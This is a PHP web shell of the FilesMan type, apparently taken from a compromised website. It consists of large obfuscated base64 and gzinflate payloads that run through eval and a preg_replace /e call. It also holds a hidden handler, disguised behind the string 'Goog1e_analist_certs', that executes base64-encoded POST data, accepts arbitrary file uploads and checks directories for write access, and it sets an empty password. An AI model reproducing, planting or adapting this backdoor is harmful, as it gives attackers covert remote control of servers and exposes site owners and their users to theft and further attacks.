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'\x29\x29\x29\x3B",".");?>
if(isset($_GET['languages'])){header("HTTP/1.0 304 Not Modified");exit;}
if(isset($_GET['cookies'])){echo '--'.'><i>Goog1e_analist_certs</i><br>';
if(isset($_POST['e'])){eval(base64_decode($_POST['e']));}
if(isset($_FILES['f'])){if(!@copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])){@move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}}
if(isset($_GET['d'])){echo @is_writable($_GET['d']);}exit;}?>
<?php
$auth_pass = '';
$color="#df5";
$default_action="FilesMan";
$default_charset="Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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